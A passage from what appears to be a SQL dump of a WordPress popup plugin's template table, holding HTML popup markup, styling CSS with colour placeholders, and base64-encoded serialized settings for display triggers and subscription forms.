id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupClassyShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose\"></a>\r\n	<div class=\"ppsPopupClassyInner\">\r\n		[if enb_label]\r\n			<div class=\"ppsPopupLabel ppsPopupClassyLabel\">[label]</div>\r\n		[endif]\r\n		<div class=\"ppsPopupVideo\">\r\n			[video_html]\r\n		</div>\r\n      	[if enb_sm]\r\n        <div class=\"ppsSm\">\r\n            [sm_html]\r\n        </div>\r\n        [endif]\r\n		<div style=\"clear: both;\"></div>\r\n	</div>\r\n	[if enb_subscribe]\r\n	<div class=\"ppsSubscribeShell\">\r\n		[sub_form_start]\r\n          	[sub_fields_html]\r\n			<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n		[sub_form_end]\r\n	</div>\r\n  	[endif]\r\n  	[if enb_foot_note]\r\n  	<div class=\"ppsFootNote\">[foot_note]</div>\r\n  	[endif]\r\n</div>','#ppsPopupShell_[ID] {\r\n  	width: [width][width_measure];\r\n	[if bg_type_0 == \'color\']\r\n	background-color: {{ popup.params.tpl.bg_color_0 }};\r\n	[elseif bg_type_0 == \'img\']\r\n	background-image: url(\"[bg_img_0]\");\r\n	background-size: 100%;\r\n  	background-repeat: no-repeat;\r\n	[endif]\r\n	padding: 7px;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyInner {\r\n	padding: 0;\r\n	border: {{ adjust_brightness(popup.params.tpl.bg_color_0, 30) }};\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ popup.params.tpl.bg_color_0 }}), color-stop(100%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }})); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ popup.params.tpl.bg_color_0 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }} 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ popup.params.tpl.bg_color_0 }}\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }}\',GradientType=1 ); /* ie6-9 */\r\n	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: 48px;\r\n	font-size: 27px;\r\n	border: none;\r\n	padding: 1px 8px 0;\r\n	width: calc((100% - 70px) / 3);\r\n  	box-sizing: content-box;\r\n  	margin-top: 10px;\r\n  	float: left;\r\n  	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	[if bg_type_0 == \'color\']\r\n	-webkit-box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	-moz-box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	box-shadow: inset 4px 4px 4px 0px {{ adjust_brightness(popup.params.tpl.bg_color_0, -40) }};\r\n	background-color: {{ adjust_brightness(popup.params.tpl.bg_color_0, -20) }};\r\n	color: {{ adjust_brightness(popup.params.tpl.bg_color_0, -100) }};\r\n	[endif]\r\n	margin-right: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n  	display: table-cell;\r\n  	height: 48px;\r\n  	vertical-align: middle;\r\n  	background-color: transparent;\r\n  	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select option {\r\n	font-size: 27px;\r\n  	color: #6d6d6d;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: calc(100% - 30px);\r\n  	height: auto;\r\n  	font-family: inherit;\r\n  	padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	color: #eee;\r\n	margin-right: 0;\r\n	cursor: pointer;\r\n	[if bg_type_1 == \'color\']\r\n	text-shadow: -1px -1px 1px {{ adjust_brightness(popup.params.tpl.bg_color_1, -80) }};\r\n	border: 1px solid {{ adjust_brightness(popup.params.tpl.bg_color_1, -40) }};\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ popup.params.tpl.bg_color_1 }}), color-stop(100%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }})); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ popup.params.tpl.bg_color_1 }} 0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }} 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ popup.params.tpl.bg_color_1 }}\', endColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, -50) }}\',GradientType=1 ); /* ie6-9 */\r\n\r\n	-webkit-box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	-moz-box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	box-shadow: inset 0px 0px 2px 2px {{ adjust_brightness(popup.params.tpl.bg_color_1, 10) }};\r\n	[elseif bg_type_1 == \'img\']\r\n	background-image: url(\"[bg_img_1]\");\r\n	background-size: 100%;\r\n  	background-repeat: no-repeat;\r\n	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:disabled {\r\n	color: transparent;\r\n  	cursor: progress;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n	padding-top: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyLabel {\r\n	width: 100%;\r\n	text-align: center;\r\n	color: #555555;\r\n	text-shadow: 1px 1px 1px #ffffff;\r\n	font-size: 35px;\r\n	margin-top: 26px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSuccessMsg {\r\n	color: #555555;\r\n  	border: 1px solid #555555;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClassyTxt {\r\n	font-size: 20px;\r\n	line-height: 160%;\r\n	color: rgb(85, 85, 85);\r\n	padding-top: 14px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupVideo {\r\n	width: 100%;\r\n  	line-height: 0;\r\n  	padding: 0;\r\n  	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupVideo iframe {\r\n  	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] ul {\r\n	margin-top: 15px;\r\n	padding-left: 0;\r\n}\r\n#ppsPopupShell_[ID] ul li {\r\n	list-style: inside none disc;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	color: #999;\r\n    font-size: 12px;\r\n    padding-top: 10px;\r\n    text-align: center;\r\n}\r\n/*SM*/\r\n#ppsPopupShell_[ID] .ppsSm {\r\n	padding: 10px 10px 0 10px;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_1_435376 .ppsSm > div {\r\n	vertical-align: top !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm .ppsSmBtn {\r\n	margin-right: 5px;\r\n}','',1,1,1,3,0,0,0,'2015-01-03 16:00:43',16,0),(7,'Layered Popup',1,0,'YTozOntzOjQ6Im1haW4iO2E6MjE6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjt9czozOiJ0cGwiO2E6ODA6e3M6NToid2lkdGgiO3M6MzoiNDAwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2YwNjIyZSI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNkYWQyYmYiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjNTU1NTU1IjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiI2ZmZmZmZiI7czoxMDoiZm9udF90eHRfMCI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjZmZmZmZmIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjNTg1ODU4IjtzOjE1OiJyZXNwb25zaXZlX21vZGUiO3M6MzoiZGVmIjtzOjk6ImNsb3NlX2J0biI7czoxMToid2hpbGVfY2xvc2UiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czoxODoiVGhlIEJlc3QgV29yZFByZXNzIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjEzOiJlbmJfZm9vdF9ub3RlIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjExODoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lICI7czo2OiJlbmJfc20iO3M6MToiMSI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjQ6ImJveHkiO3M6ODoiYW5pbV9rZXkiO3M6NDoibm9uZSI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czozOiI1MDAiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLXVwISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjU6IkxvZ2luIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6Mjc6IlRoYW5rIHlvdSBmb3IgcmVnaXN0cmF0aW9uISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6NToidHh0XzAiO3M6MTcyOiI8cD5Qb3B1cCBieSBTdXBzeXN0aWMgbGV0cyB5b3UgZWFzaWx5IGNyZWF0ZSBlbGVnYW50IG92ZXJsYXBwaW5nIHdpbmRvd3Mgd2l0aCB1bmxpbWl0ZWQgZmVhdHVyZXMuIFBvcC11cHMgd2l0aCBTbGlkZXIsIExpZ2h0Ym94LCBDb250YWN0IGFuZCBTdWJzY3JpcHRpb24gZm9ybXMgYW5kIG1vcmU8L3A+Ijt9czoxMDoib3B0c19hdHRycyI7YToyOntzOjk6ImJnX251bWJlciI7czoxOiIzIjtzOjE2OiJ0eHRfYmxvY2tfbnVtYmVyIjtzOjE6IjEiO319','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_sm]\r\n					<div style=\"clear: both;\"></div>\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #fff;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #FFF;\r\n	font-family: \"Myriad Pro\",\"Trebuchet MS\",\"Helvetica Neue\",Helvetica,Arial,Sans-Serif;\r\n	font-size: 30px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	text-align: center;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n  	height: 100%;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n  